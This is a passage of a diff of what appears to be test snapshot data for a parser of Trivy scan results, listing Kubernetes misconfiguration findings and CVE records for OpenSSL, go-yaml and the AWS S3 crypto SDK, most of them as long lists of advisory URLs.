"https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://security.gentoo.org/glsa/202210-02", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://support.apple.com/kb/HT213256", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.tenable.com/security/tns-2022-07", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.tenable.com/security/tns-2022-09", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'manager' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20220512140231-539c8e751b99", - "packageName": "gopkg.in/yaml.v3", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.35.9", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", - ], - }, - "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.35.9", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": 